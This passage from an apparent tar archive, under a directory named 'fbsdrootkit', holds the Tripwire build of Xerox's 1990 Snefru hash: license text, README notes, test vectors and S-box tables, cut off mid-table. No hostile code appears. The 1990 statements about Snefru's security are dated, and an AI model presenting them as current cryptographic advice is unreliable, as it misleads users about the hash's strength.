19cc76d5 db4a2c05 f2cc2cc5 % ./snefru256 123 061c76aa 1db4a22c 0e42945e 26c48499 b5400162 e08c640b e05d3c00 7c44793d % ./snefru256 1234 1e87fe1d 9c927e9e 24be85e3 cc733598 73541640 a6261793 ce5a9749 53113f5e % ./snefru256 12345 1b59927d 85a9349a 87796620 fe2ff401 a06a7ba4 8794498e bab978ef c3a68912 % ./snefru256 123456 28e9d9bc 35032b68 faeda881 01ecb252 4317e9da 111b0e3e 70941072 12d9cf72 % ./snefru256 1234567 f7fff4ee 74fd1b8d 6b3267f8 4e47e007 f029d13b 8af7e37e 34d13b46 9b8f248f % ./snefru256 12345678 ee7d64b0 102b2205 e9892661 3b200185 559d08be 6ad787da 717c9687 44e11af3 % ./snefru256 123456789 4ca72639 e40e9ab9 c0c3f523 c4449b39 11632d37 4c124d77 02192ec2 e4e0b7a3 % Note that "word32" MUST be 32 bits Implementor: Ralph C. Merkle */ ================== The Snefru one-way hash function package is copyrighted by Xerox Corporation. The disclaimer from the C code has been retained, and is shown above. All big-endian/little-endian specific code in snefru.c has been replaced by code that can resolve this automatically at compile-time. Tripwire specific code is also in snefru.c to to minimize the amount of overhead in collecting signatures from within Tripwire. (We certainly don't want to fork() for every file we need to scan!) Because of this, snefru.c is no longer identical to the virgin Snefru distribution. I have sent my changes to the author, but I am not aware of any buybacks at this time. The original Snefru code can be obtained via anonymous FTP from arisia.xerox.com. The original README file has been retained in the Tripwire distribution. Gene Kim September 7, 1992 fbsdrootkit-1.2/tripwire-1.2/sigs/snefru/snefru.c100600 764 764 236401 5614757154 17277 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: snefru.c,v 1.9 1994/07/25 15:46:52 gkim Exp $"; #endif /* * snefru.c * * signature function hook for Snefru (the Xerox Secure Hash Function) * for Tripwire. * * Originally released by Xerox into the public domain. Slightly * changed to facilitate hook into other packages and increase * portability. * * The original distribution banner follows. * * Gene Kim * Purdue University * September 27, 1992 */ char *pltob64(); /* This is an implementation of Snefru. Snefru is a one-way hash function that provides authentication. It does not provide secrecy. Snefru is named after a Pharaoh of ancient Egypt. Copyright (c) Xerox Corporation 1989. All rights reserved. License to copy and use this software is granted provided that it is identified as the "Xerox Secure Hash Function" in all material mentioning or referencing this software or this hash function. License is also granted to make and use derivative works provided that such works are identified as "derived from the Xerox Secure Hash Function" in all material mentioning or referencing the derived work. Xerox Corporation makes no representations concerning either the merchantability of this software or the suitability of this software for any particular purpose. It is provided "as is" without express or implied warranty of any kind. These notices must be retained in any copies of any part of this software. Updated information about Snefru is available from arisia.xerox.com in directory /pub/hash by anonymous FTP. The README file provides a quick introduction. This is version 2.5a, November 29, 1990. Version 2.5a provides a reasonably understandable and efficient implementation of Snefru. Further, this version provides 8 passes. While 4 pass Snefru has not been broken, the use of 4 pass Snefru for production use is not recommended at this time. Further study of the security of Snefru is required before production use is advisable. This program reads from the standard input until EOF is reached (the first "read" that returns 0 bytes). The data on the standard input is "hashed" with a cryptographically secure one-way hash function (also known as a "message digest", "fingerprint", "Manipulation Detection Code" or "MDC"). The hash is then printed on the standard output. The input can be of any size. The output is 128 bits printed as 32 characters in hex. The output size can be changed to 256 bits be setting the parameter OUTPUT_BLOCK_SIZE to 8. (The 8 indicates the number of 32-bit words in the output). The primary use of one-way hash functions is to determine if there have been any unauthorized, malicious, or accidental changes made to a file. For example, if an executable program file produces the hash "209884c4 2e89d967 5456ac0e 61269550", then any change to that program file will cause the hash to be changed. Thus, the tampering can be detected by comparing the current output value with the previously computed (and presumably correct) output value. Hash512 is the centrol routine in this program. It is used in this program in a linear fashion -- i.e., a sequential file is hashed down by repeated applications of Hash512. Changing a single bit in the file would then require completely re-computing the hash from the point of change onward. Hash512 can be used in a tree-structured fashion to authenticate a large table of data. This would imply that changing a single bit would not force a complete re-computation of the hash value, but would instead require only log n re-computations of Hash512 to "patch up" the changes along the path from the root to the changed leaf entry. A tree-structured application also has the advantage that any single entry in the table can subsequently be authenticated by someone who knows only the "authentication path" from the root of the tree to the leaf entry. These concepts are discussed more thoroughly in "Secrecy, Authentication, and Public Key Systems" by Ralph C. Merkle, UMI Research Press, 1982 (see particularly Chapter 2, "One Way Hash Functions"). The use of a tree-structured pattern of applications of a one-way hash function is covered by U.S. Patent #4,309,569, "Method of Providing Digital Signatures" (contact Stanford University, Office of Technology Licensing). At the present time (November 29, 1990) the author knows of no method for "breaking" this one-way function, (i.e., finding two input files that produce the same output value). We recommend against the use of output sizes smaller than 128 bits, and against the use of an input that is less than 2 (two) words larger than the size of the output. When the input size equals the output size, Snefru suffers a serious degradation in security (an observation due to Coppersmith). Further study and validation of the security of Snefru is required prior to production use. If anyone using this program finds two different inputs that produce the same output, please contact Ralph C. Merkle via E-mail (merkle@xerox.com) or via normal mail at: Xerox PARC 3333 Coyote Hill Road Palo Alto, CA 94304 (415) 494-4000 See the paper "A Fast Software One Way Hash Function" by Ralph C. Merkle, to appear in The Journal of Cryptology, for a more detailed explanation. The following test cases were taken directly from a terminal, and can be used to verify the correct functioning of an implementation of Snefru. The first input is simply a carriage return followed by control-d. The second input is "1" followed by carriage return followed by control-d, the third input is "12" followed by carriage return followed by control-d, etc. (In some cases, two control-d's will be required). Note that the test cases given are from 8-pass Snefru (e.g., SECURITY_LEVEL=8) % ./snefru d9fcb317 1c097fbb a8c8f12a a0906bad % ./snefru 1 44ec420c e99c1f62 feb66c53 c24ae453 % ./snefru 12 7182051a a852ef6f ba4b6c9c 9b79b317 % ./snefru 123 bc3a50af 82bf56d6 a64732bc 7b050a93 % ./snefru 1234 c5b8a049 85a8eadf b4331a89 88752b77 % ./snefru 12345 d559a2b6 2f6f4411 1324f852 08723707 % ./snefru 123456 6cfb5e8f 1da02bd1 67b01e48 16686c30 % ./snefru 1234567 29aa4832 5f275a8a 7a01ba15 43c54ba5 % ./snefru 12345678 be862a6b 68b7df88 7ebe0031 9cbc4a47 % ./snefru 123456789 6103721c cd8ad565 d68e90b0 f8906163 % The following outputs were obtained after the program was compiled with OUTPUT_BLOCK_SIZE set to 8. This can be done by using the -D option on cc, as: cc -o snefru256 -DOUTPUT_BLOCK_SIZE=8 snefru.c Note that the test cases given are from 8-pass Snefru (e.g., SECURITY_LEVEL=8) % ./snefru256 2e02687f 0d45d5b9 b50cb68c 3f33e684 3d618a1a ca2d0689 3d3eb4e3 026b5732 % ./snefru256 1 bfea4a05 a2a2ef15 c736d114 598a20b9 d9bd4d66 b661e6b0 5ecf6a77 37bdc58c % ./snefru256 12 ac677d69 761ade3f 189c7aef 106d5fe7 392d324e 19cc76d5 db4a2c05 f2cc2cc5 % ./snefru256 123 061c76aa 1db4a22c 0e42945e 26c48499 b5400162 e08c640b e05d3c00 7c44793d % ./snefru256 1234 1e87fe1d 9c927e9e 24be85e3 cc733598 73541640 a6261793 ce5a9749 53113f5e % ./snefru256 12345 1b59927d 85a9349a 87796620 fe2ff401 a06a7ba4 8794498e bab978ef c3a68912 % ./snefru256 123456 28e9d9bc 35032b68 faeda881 01ecb252 4317e9da 111b0e3e 70941072 12d9cf72 % ./snefru256 1234567 f7fff4ee 74fd1b8d 6b3267f8 4e47e007 f029d13b 8af7e37e 34d13b46 9b8f248f % ./snefru256 12345678 ee7d64b0 102b2205 e9892661 3b200185 559d08be 6ad787da 717c9687 44e11af3 % ./snefru256 123456789 4ca72639 e40e9ab9 c0c3f523 c4449b39 11632d37 4c124d77 02192ec2 e4e0b7a3 % Note that "word32" MUST be 32 bits Implementor: Ralph C. Merkle */ #include "../../include/config.h" #include #include #ifdef STDLIBH #include #include #endif #ifdef STRINGH #include #else #include #endif #include "../../include/sigs.h" #include "../../include/byteorder.h" #define INPUT_BLOCK_SIZE 16 /* size in 32-bit words of an input block to * the hash routine */ /* * OUTPUT_BLOCK_SIZE may be set to either 4 or 8. 8 should provide * a higher level of security (if we presume Snefru can only be broken * by a brute force attack, than an output size of 8 words or 256 bits * would require some 2**128 operations to break). The default is 4. * This parameter can be changed with the -DOUTPUT_BLOCK_SIZE=8 * command line option to the C compiler. */ #ifndef OUTPUT_BLOCK_SIZE #define OUTPUT_BLOCK_SIZE 4 /* size in 32-bit words of an output block * from the hash routine */ #endif #define CHUNK_SIZE (INPUT_BLOCK_SIZE - OUTPUT_BLOCK_SIZE) /* generate a mask with log-to-the-base-2(INPUT_BLOCK_SIZE) "1" bits */ #define MASK (INPUT_BLOCK_SIZE - 1) #define round(L,C,N,SB) SBE=SB[C&0xffL];L^=SBE;N^=SBE #define rotate(B) B=(B>>shift) | (B< command * line option to the C compiler. */ #ifndef SECURITY_LEVEL #define SECURITY_LEVEL 8 #endif #define MAX_SBOX_COUNT 16 /* Identify this version for the "what" command */ char ident[] ="@(#) Snefru Version 2.5a November 29, 1990"; #if defined(TW_TYPE32) typedef unsigned TW_TYPE32 word32; #else typedef unsigned long int word32; #endif /* The standard S-Box */ word32 standardSBoxes[MAX_SBOX_COUNT][256]= { { /* Start of S Box 0 */ /* 0*/ 0x64f9001bL,0xfeddcdf6L,0x7c8ff1e2L,0x11d71514L,0x8b8c18d3L, /* 5*/ 0xdddf881eL,0x6eab5056L,0x88ced8e1L,0x49148959L,0x69c56fd5L, /* 10*/ 0xb7994f03L,0x0fbcee3eL,0x3c264940L,0x21557e58L,0xe14b3fc2L, /* 15*/ 0x2e5cf591L,0xdceff8ceL,0x092a1648L,0xbe812936L,0xff7b0c6aL, /* 20*/ 0xd5251037L,0xafa448f1L,0x7dafc95aL,0x1ea69c3fL,0xa417abe7L, /* 25*/ 0x5890e423L,0xb0cb70c0L,0xc85025f7L,0x244d97e3L,0x1ff3595fL, /* 30*/ 0xc4ec6396L,0x59181e17L,0xe635b477L,0x354e7dbfL,0x796f7753L, /* 35*/ 0x66eb52ccL,0x77c3f995L,0x32e3a927L,0x80ccaed6L,0x4e2be89dL, /* 40*/ 0x375bbd28L,0xad1a3d05L,0x2b1b42b3L,0x16c44c71L,0x4d54bfa8L, /* 45*/ 0xe57ddc7aL,0xec6d8144L,0x5a71046bL,0xd8229650L,0x87fc8f24L, /* 50*/ 0xcbc60e09L,0xb6390366L,0xd9f76092L,0xd393a70bL,0x1d31a08aL, /* 55*/ 0x9cd971c9L,0x5c1ef445L,0x86fab694L,0xfdb44165L,0x8eaafcbeL, /* 60*/ 0x4bcac6ebL,0xfb7a94e5L,0x5789d04eL,0xfa13cf35L,0x236b8da9L, /* 65*/ 0x4133f000L,0x6224261cL,0xf412f23bL,0xe75e56a4L,0x30022116L, /* 70*/ 0xbaf17f1fL,0xd09872f9L,0xc1a3699cL,0xf1e802aaL,0x0dd145dcL, /* 75*/ 0x4fdce093L,0x8d8412f0L,0x6cd0f376L,0x3de6b73dL,0x84ba737fL, /* 80*/ 0xb43a30f2L,0x44569f69L,0x00e4eacaL,0xb58de3b0L,0x959113c8L, /* 85*/ 0xd62efee9L,0x90861f83L,0xced69874L,0x2f793ceeL,0xe8571c30L, /* 90*/ 0x483665d1L,0xab07b031L,0x914c844fL,0x15bf3be8L,0x2c3f2a9aL, /* 95*/ 0x9eb95fd4L,0x92e7472dL,0x2297cc5bL,0xee5f2782L,0x5377b562L, /* 100*/ 0xdb8ebbcfL,0xf961deddL,0xc59b5c60L,0x1bd3910dL,0x26d206adL, /* 105*/ 0xb28514d8L,0x5ecf6b52L,0x7fea78bbL,0x504879acL,0xed34a884L, /* 110*/ 0x36e51d3cL,0x1753741dL,0x8c47caedL,0x9d0a40efL,0x3145e221L, /* 115*/ 0xda27eb70L,0xdf730ba3L,0x183c8789L,0x739ac0a6L,0x9a58dfc6L, /* 120*/ 0x54b134c1L,0xac3e242eL,0xcc493902L,0x7b2dda99L,0x8f15bc01L, /* 125*/ 0x29fd38c7L,0x27d5318fL,0x604aaff5L,0xf29c6818L,0xc38aa2ecL, /* 130*/ 0x1019d4c3L,0xa8fb936eL,0x20ed7b39L,0x0b686119L,0x89a0906fL, /* 135*/ 0x1cc7829eL,0x9952ef4bL,0x850e9e8cL,0xcd063a90L,0x67002f8eL, /* 140*/ 0xcfac8cb7L,0xeaa24b11L,0x988b4e6cL,0x46f066dfL,0xca7eec08L, /* 145*/ 0xc7bba664L,0x831d17bdL,0x63f575e6L,0x9764350eL,0x47870d42L, /* 150*/ 0x026ca4a2L,0x8167d587L,0x61b6adabL,0xaa6564d2L,0x70da237bL, /* 155*/ 0x25e1c74aL,0xa1c901a0L,0x0eb0a5daL,0x7670f741L,0x51c05aeaL, /* 160*/ 0x933dfa32L,0x0759ff1aL,0x56010ab8L,0x5fdecb78L,0x3f32edf8L, /* 165*/ 0xaebedbb9L,0x39f8326dL,0xd20858c5L,0x9b638be4L,0xa572c80aL, /* 170*/ 0x28e0a19fL,0x432099fcL,0x3a37c3cdL,0xbf95c585L,0xb392c12aL, /* 175*/ 0x6aa707d7L,0x52f66a61L,0x12d483b1L,0x96435b5eL,0x3e75802bL, /* 180*/ 0x3ba52b33L,0xa99f51a5L,0xbda1e157L,0x78c2e70cL,0xfcae7ce0L, /* 185*/ 0xd1602267L,0x2affac4dL,0x4a510947L,0x0ab2b83aL,0x7a04e579L, /* 190*/ 0x340dfd80L,0xb916e922L,0xe29d5e9bL,0xf5624af4L,0x4ca9d9afL, /* 195*/ 0x6bbd2cfeL,0xe3b7f620L,0xc2746e07L,0x5b42b9b6L,0xa06919bcL, /* 200*/ 0xf0f2c40fL,0x72217ab5L,0x14c19df3L,0xf3802daeL,0xe094beb4L, /* 205*/ 0xa2101affL,0x0529575dL,0x55cdb27cL,0xa33bddb2L,0x6528b37dL, /* 210*/ 0x740c05dbL,0xe96a62c4L,0x40782846L,0x6d30d706L,0xbbf48e2cL, /* 215*/ 0xbce2d3deL,0x049e37faL,0x01b5e634L,0x2d886d8dL,0x7e5a2e7eL, /* 220*/ 0xd7412013L,0x06e90f97L,0xe45d3ebaL,0xb8ad3386L,0x13051b25L, /* 225*/ 0x0c035354L,0x71c89b75L,0xc638fbd0L,0x197f11a1L,0xef0f08fbL, /* 230*/ 0xf8448651L,0x38409563L,0x452f4443L,0x5d464d55L,0x03d8764cL, /* 235*/ 0xb1b8d638L,0xa70bba2fL,0x94b3d210L,0xeb6692a7L,0xd409c2d9L, /* 240*/ 0x68838526L,0xa6db8a15L,0x751f6c98L,0xde769a88L,0xc9ee4668L, /* 245*/ 0x1a82a373L,0x0896aa49L,0x42233681L,0xf62c55cbL,0x9f1c5404L, /* 250*/ 0xf74fb15cL,0xc06e4312L,0x6ffe5d72L,0x8aa8678bL,0x337cd129L, /* 255*/ 0x8211cefdL /* End of S Box 0 */ }, { /* Start of S Box 1 */ /* 0*/ 0x074a1d09L,0x52a10e5aL,0x9275a3f8L,0x4b82506cL,0x37df7e1bL, /* 5*/ 0x4c78b3c5L,0xcefab1daL,0xf472267eL,0xb63045f6L,0xd66a1fc0L, /* 10*/ 0x400298e3L,0x27e60c94L,0x87d2f1b8L,0xdf9e56ccL,0x45cd1803L, /* 15*/ 0x1d35e098L,0xcce7c736L,0x03483bf1L,0x1f7307d7L,0xc6e8f948L, /* 20*/ 0xe613c111L,0x3955c6ffL,0x1170ed7cL,0x8e95da41L,0x99c31bf4L, /* 25*/ 0xa4da8021L,0x7b5f94fbL,0xdd0da51fL,0x6562aa77L,0x556bcb23L, /* 30*/ 0xdb1bacc6L,0x798040b9L,0xbfe5378fL,0x731d55e6L,0xdaa5bfeeL, /* 35*/ 0x389bbc60L,0x1b33fba4L,0x9c567204L,0x36c26c68L,0x77ee9d69L, /* 40*/ 0x8aeb3e88L,0x2d50b5ceL,0x9579e790L,0x42b13cfcL,0x33fbd32bL, /* 45*/ 0xee0503a7L,0xb5862824L,0x15e41eadL,0xc8412ef7L,0x9d441275L, /* 50*/ 0x2fcec582L,0x5ff483b7L,0x8f3931dfL,0x2e5d2a7bL,0x49467bf9L, /* 55*/ 0x0653dea9L,0x2684ce35L,0x7e655e5cL,0xf12771d8L,0xbb15cc67L, /* 60*/ 0xab097ca1L,0x983dcf52L,0x10ddf026L,0x21267f57L,0x2c58f6b4L, /* 65*/ 0x31043265L,0x0bab8c01L,0xd5492099L,0xacaae619L,0x944ce54aL, /* 70*/ 0xf2d13d39L,0xadd3fc32L,0xcda08a40L,0xe2b0d451L,0x9efe08aeL, /* 75*/ 0xb9d50fd2L,0xea5cd7fdL,0xc9a749ddL,0x13ea2253L,0x832debaaL, /* 80*/ 0x24be640fL,0xe03e926aL,0x29e01cdeL,0x8bf59f18L,0x0f9d00b6L, /* 85*/ 0xe1238b46L,0x1e7d8e34L,0x93619adbL,0x76b32f9fL,0xbd972cecL, /* 90*/ 0xe31fa976L,0xa68fbb10L,0xfb3ba49dL,0x8587c41dL,0xa5add1d0L, /* 95*/ 0xf3cf84bfL,0xd4e11150L,0xd9ffa6bcL,0xc3f6018cL,0xaef10572L, /* 100*/ 0x74a64b2fL,0xe7dc9559L,0x2aae35d5L,0x5b6f587fL,0xa9e353feL, /* 105*/ 0xca4fb674L,0x04ba24a8L,0xe5c6875fL,0xdcbc6266L,0x6bc5c03fL, /* 110*/ 0x661eef02L,0xed740babL,0x058e34e4L,0xb7e946cfL,0x88698125L, /* 115*/ 0x72ec48edL,0xb11073a3L,0xa13485ebL,0xa2a2429cL,0xfa407547L, /* 120*/ 0x50b76713L,0x5418c37dL,0x96192da5L,0x170bb04bL,0x518a021eL, /* 125*/ 0xb0ac13d1L,0x0963fa2aL,0x4a6e10e1L,0x58472bdcL,0xf7f8d962L, /* 130*/ 0x979139eaL,0x8d856538L,0xc0997042L,0x48324d7aL,0x447623cbL, /* 135*/ 0x8cbbe364L,0x6e0c6b0eL,0xd36d63b0L,0x3f244c84L,0x3542c971L, /* 140*/ 0x2b228dc1L,0xcb0325bbL,0xf8c0d6e9L,0xde11066bL,0xa8649327L, /* 145*/ 0xfc31f83eL,0x7dd80406L,0xf916dd61L,0xd89f79d3L,0x615144c2L, /* 150*/ 0xebb45d31L,0x28002958L,0x56890a37L,0xf05b3808L,0x123ae844L, /* 155*/ 0x86839e16L,0x914b0d83L,0xc506b43cL,0xcf3cba5eL,0x7c60f5c9L, /* 160*/ 0x22deb2a0L,0x5d9c2715L,0xc77ba0efL,0x4f45360bL,0xc1017d8bL, /* 165*/ 0xe45adc29L,0xa759909bL,0x412cd293L,0xd7d796b1L,0x00c8ff30L, /* 170*/ 0x23a34a80L,0x4ec15c91L,0x714e78b5L,0x47b9e42eL,0x78f3ea4dL, /* 175*/ 0x7f078f5bL,0x346c593aL,0xa3a87a1aL,0x9bcbfe12L,0x3d439963L, /* 180*/ 0xb2ef6d8eL,0xb8d46028L,0x6c2fd5caL,0x62675256L,0x01f2a2f3L, /* 185*/ 0xbc96ae0aL,0x709a8920L,0xb4146e87L,0x6308b9e2L,0x64bda7baL, /* 190*/ 0xafed6892L,0x6037f2a2L,0xf52969e0L,0x0adb43a6L,0x82811400L, /* 195*/ 0x90d0bdf0L,0x19c9549eL,0x203f6a73L,0x1accaf4fL,0x89714e6dL, /* 200*/ 0x164d4705L,0x67665f07L,0xec206170L,0x0c2182b2L,0xa02b9c81L, /* 205*/ 0x53289722L,0xf6a97686L,0x140e4179L,0x9f778849L,0x9a88e15dL, /* 210*/ 0x25cadb54L,0xd157f36fL,0x32a421c3L,0xb368e98aL,0x5a92cd0dL, /* 215*/ 0x757aa8d4L,0xc20ac278L,0x08b551c7L,0x849491e8L,0x4dc75ad6L, /* 220*/ 0x697c33beL,0xbaf0ca33L,0x46125b4eL,0x59d677b3L,0x30d9c8f2L, /* 225*/ 0xd0af860cL,0x1c7fd0faL,0xfe0ff72cL,0x5c8d6f43L,0x57fdec3bL, /* 230*/ 0x6ab6ad97L,0xd22adf89L,0x18171785L,0x02bfe22dL,0x6db80917L, /* 235*/ 0x80b216afL,0xe85e4f9aL,0x7a1c306eL,0x6fc49bf5L,0x3af7a11cL, /* 240*/ 0x81e215e7L,0x68363fcdL,0x3e9357c8L,0xef52fd55L,0x3b8bab4cL, /* 245*/ 0x3c8cf495L,0xbefceebdL,0xfd25b714L,0xc498d83dL,0x0d2e1a8dL, /* 250*/ 0xe9f966acL,0x0e387445L,0x435419e5L,0x5e7ebec4L,0xaa90b8d9L, /* 255*/ 0xff1a3a96L /* End of S Box 1 */ }, { /* Start of S Box 2 */ /* 0*/ 0x4a8fe4e3L,0xf27d99cdL,0xd04a40caL,0xcb5ff194L,0x3668275aL, /* 5*/ 0xff4816beL,0xa78b394cL,0x4c6be9dbL,0x4eec38d2L,0x4296ec80L, /* 10*/ 0xcdce96f8L,0x888c2f38L,0xe75508f5L,0x7b916414L,0x060aa14aL, /* 15*/ 0xa214f327L,0xbe608dafL,0x1ebbdec2L,0x61f98ce9L,0xe92156feL, /* 20*/ 0x4f22d7a3L,0x3f76a8d9L,0x559a4b33L,0x38ad2959L,0xf3f17e9eL, /* 25*/ 0x85e1ba91L,0xe5eba6fbL,0x73dcd48cL,0xf5c3ff78L,0x481b6058L, /* 30*/ 0x8a3297f7L,0x8f1f3bf4L,0x93785ab2L,0x477a4a5bL,0x6334eb5dL, /* 35*/ 0x6d251b2eL,0x74a9102dL,0x07e38ffaL,0x915c9c62L,0xccc275eaL, /* 40*/ 0x6be273ecL,0x3ebddd70L,0xd895796cL,0xdc54a91bL,0xc9afdf81L, /* 45*/ 0x23633f73L,0x275119b4L,0xb19f6b67L,0x50756e22L,0x2bb152e2L, /* 50*/ 0x76ea46a2L,0xa353e232L,0x2f596ad6L,0x0b1edb0bL,0x02d3d9a4L, /* 55*/ 0x78b47843L,0x64893e90L,0x40f0caadL,0xf68d3ad7L,0x46fd1707L, /* 60*/ 0x1c9c67efL,0xb5e086deL,0x96ee6ca6L,0x9aa34774L,0x1ba4f48aL, /* 65*/ 0x8d01abfdL,0x183ee1f6L,0x5ff8aa7aL,0x17e4faaeL,0x303983b0L, /* 70*/ 0x6c08668bL,0xd4ac4382L,0xe6c5849fL,0x92fefb53L,0xc1cac4ceL, /* 75*/ 0x43501388L,0x441118cfL,0xec4fb308L,0x53a08e86L,0x9e0fe0c5L, /* 80*/ 0xf91c1525L,0xac45be05L,0xd7987cb5L,0x49ba1487L,0x57938940L, /* 85*/ 0xd5877648L,0xa958727fL,0x58dfe3c3L,0xf436cf77L,0x399e4d11L, /* 90*/ 0xf0a5bfa9L,0xef61a33bL,0xa64cac60L,0x04a8d0baL,0x030dd572L, /* 95*/ 0xb83d320fL,0xcab23045L,0xe366f2f0L,0x815d008dL,0xc897a43aL, /* 100*/ 0x1d352df3L,0xb9cc571dL,0x8bf38744L,0x72209092L,0xeba124ebL, /* 105*/ 0xfb99ce5eL,0x3bb94293L,0x28da549cL,0xaab8a228L,0xa4197785L, /* 110*/ 0x33c70296L,0x25f6259bL,0x5c85da21L,0xdf15bdeeL,0x15b7c7e8L, /* 115*/ 0xe2abef75L,0xfcc19bc1L,0x417ff868L,0x14884434L,0x62825179L, /* 120*/ 0xc6d5c11cL,0x0e4705dcL,0x22700de0L,0xd3d2af18L,0x9be822a0L, /* 125*/ 0x35b669f1L,0xc42bb55cL,0x0a801252L,0x115bf0fcL,0x3cd7d856L, /* 130*/ 0xb43f5f9dL,0xc2306516L,0xa1231c47L,0xf149207eL,0x5209a795L, /* 135*/ 0x34b3ccd8L,0x67aefe54L,0x2c83924eL,0x6662cbacL,0x5eedd161L, /* 140*/ 0x84e681aaL,0x5d57d26bL,0xfa465cc4L,0x7e3ac3a8L,0xbf7c0cc6L, /* 145*/ 0xe18a9aa1L,0xc32f0a6fL,0xb22cc00dL,0x3d280369L,0x994e554fL, /* 150*/ 0x68f480d3L,0xadcff5e6L,0x3a8eb265L,0x83269831L,0xbd568a09L, /* 155*/ 0x4bc8ae6aL,0x69f56d2bL,0x0f17eac8L,0x772eb6c7L,0x9f41343cL, /* 160*/ 0xab1d0742L,0x826a6f50L,0xfea2097cL,0x1912c283L,0xce185899L, /* 165*/ 0xe4444839L,0x2d8635d5L,0x65d0b1ffL,0x865a7f17L,0x326d9fb1L, /* 170*/ 0x59e52820L,0x0090ade1L,0x753c7149L,0x9ddd8b98L,0xa5a691daL, /* 175*/ 0x0d0382bbL,0x8904c930L,0x086cb000L,0x6e69d3bdL,0x24d4e7a7L, /* 180*/ 0x05244fd0L,0x101a5e0cL,0x6a947dcbL,0xe840f77bL,0x7d0c5003L, /* 185*/ 0x7c370f1fL,0x805245edL,0xe05e3d3fL,0x7906880eL,0xbabfcd35L, /* 190*/ 0x1a7ec697L,0x8c052324L,0x0c6ec8dfL,0xd129a589L,0xc7a75b02L, /* 195*/ 0x12d81de7L,0xd9be2a66L,0x1f4263abL,0xde73fdb6L,0x2a00680aL, /* 200*/ 0x56649e36L,0x3133ed55L,0x90fa0bf2L,0x2910a02aL,0x949d9d46L, /* 205*/ 0xa0d1dcddL,0xcfc9b7d4L,0xd2677be5L,0x95cb36b3L,0x13cd9410L, /* 210*/ 0xdbf73313L,0xb7c6e8c0L,0xf781414bL,0x510b016dL,0xb0de1157L, /* 215*/ 0xd6b0f62cL,0xbb074eccL,0x7f1395b7L,0xee792cf9L,0xea6fd63eL, /* 220*/ 0x5bd6938eL,0xaf02fc64L,0xdab57ab8L,0x8edb3784L,0x8716318fL, /* 225*/ 0x164d1a01L,0x26f26141L,0xb372e6b9L,0xf8fc2b06L,0x7ac00e04L, /* 230*/ 0x3727b89aL,0x97e9bca5L,0x9c2a742fL,0xbc3b1f7dL,0x7165b471L, /* 235*/ 0x609b4c29L,0x20925351L,0x5ae72112L,0x454be5d1L,0xc0ffb95fL, /* 240*/ 0xdd0ef919L,0x6f2d70c9L,0x0974c5bfL,0x98aa6263L,0x01d91e4dL, /* 245*/ 0x2184bb6eL,0x70c43c1eL,0x4d435915L,0xae7b8523L,0xb6fb06bcL, /* 250*/ 0x5431ee76L,0xfdbc5d26L,0xed77493dL,0xc5712ee4L,0xa8380437L, /* 255*/ 0x2eef261aL /* End of S Box 2 */ }, { /* Start of S Box 3 */ /* 0*/ 0x5a79392bL,0xb8af32c2L,0x41f7720aL,0x833a61ecL,0x13dfedacL, /* 5*/ 0xc4990bc4L,0xdc0f54bcL,0xfedd5e88L,0x80da1881L,0x4dea1afdL, /* 10*/ 0xfd402cc6L,0xae67cc7aL,0xc5238525L,0x8ea01254L,0xb56b9bd5L, /* 15*/ 0x862fbd6dL,0xac8575d3L,0x6fba3714L,0xda7ebf46L,0x59cd5238L, /* 20*/ 0x8ac9dbfeL,0x353729fcL,0xe497d7f2L,0xc3ab84e0L,0xf05a114bL, /* 25*/ 0x7b887a75L,0xedc603ddL,0x5e6fe680L,0x2c84b399L,0x884eb1daL, /* 30*/ 0x1cb8c8bfL,0xaa51098aL,0xc862231cL,0x8bac2221L,0x21b387e5L, /* 35*/ 0x208a430dL,0x2a3f0f8bL,0xa5ff9cd2L,0x6012a2eaL,0x147a9ee7L, /* 40*/ 0xf62a501dL,0xb4b2e51aL,0x3ef3484cL,0xc0253c59L,0x2b82b536L, /* 45*/ 0x0aa9696bL,0xbe0c109bL,0xc70b7929L,0xce3e8a19L,0x2f66950eL, /* 50*/ 0x459f1c2cL,0xe68fb93dL,0xa3c3ff3eL,0x62b45c62L,0x300991cbL, /* 55*/ 0x01914c57L,0x7f7bc06aL,0x182831f5L,0xe7b74bcaL,0xfa50f6d0L, /* 60*/ 0x523caa61L,0xe3a7cf05L,0xe9e41311L,0x280a21d1L,0x6a4297e1L, /* 65*/ 0xf24dc67eL,0xfc3189e6L,0xb72bf34fL,0x4b1e67afL,0x543402ceL, /* 70*/ 0x79a59867L,0x0648e02aL,0x00a3ac17L,0xc6208d35L,0x6e7f5f76L, /* 75*/ 0xa45bb4beL,0xf168fa63L,0x3f4125f3L,0xf311406fL,0x02706565L, /* 80*/ 0xbfe58022L,0x0cfcfdd9L,0x0735a7f7L,0x8f049092L,0xd98edc27L, /* 85*/ 0xf5c5d55cL,0xe0f201dbL,0x0dcafc9aL,0x7727fb79L,0xaf43abf4L, /* 90*/ 0x26e938c1L,0x401b26a6L,0x900720faL,0x2752d97bL,0xcff1d1b3L, /* 95*/ 0xa9d9e424L,0x42db99abL,0x6cf8be5fL,0xe82cebe3L,0x3afb733bL, /* 100*/ 0x6b734eb6L,0x1036414aL,0x975f667cL,0x049d6377L,0xba587c60L, /* 105*/ 0xb1d10483L,0xde1aefccL,0x1129d055L,0x72051e91L,0x6946d623L, /* 110*/ 0xf9e86ea7L,0x48768c00L,0xb0166c93L,0x9956bbf0L,0x1f1f6d84L, /* 115*/ 0xfb15e18eL,0x033b495dL,0x56e3362eL,0x4f44c53cL,0x747cba51L, /* 120*/ 0x89d37872L,0x5d9c331bL,0xd2ef9fa8L,0x254917f8L,0x1b106f47L, /* 125*/ 0x37d75553L,0xb3f053b0L,0x7dccd8efL,0xd30eb802L,0x5889f42dL, /* 130*/ 0x610206d7L,0x1a7d34a1L,0x92d87dd8L,0xe5f4a315L,0xd1cf0e71L, /* 135*/ 0xb22dfe45L,0xb901e8ebL,0x0fc0ce5eL,0x2efa60c9L,0x2de74290L, /* 140*/ 0x36d0c906L,0x381c70e4L,0x4c6da5b5L,0x3d81a682L,0x7e381f34L, /* 145*/ 0x396c4f52L,0x95ad5901L,0x1db50c5aL,0x29982e9eL,0x1557689fL, /* 150*/ 0x3471ee42L,0xd7e2f7c0L,0x8795a1e2L,0xbc324d8dL,0xe224c3c8L, /* 155*/ 0x12837e39L,0xcdee3d74L,0x7ad2143fL,0x0e13d40cL,0x78bd4a68L, /* 160*/ 0xa2eb194dL,0xdb9451f9L,0x859b71dcL,0x5c4f5b89L,0xca14a8a4L, /* 165*/ 0xef92f003L,0x16741d98L,0x33aa4444L,0x9e967fbbL,0x092e3020L, /* 170*/ 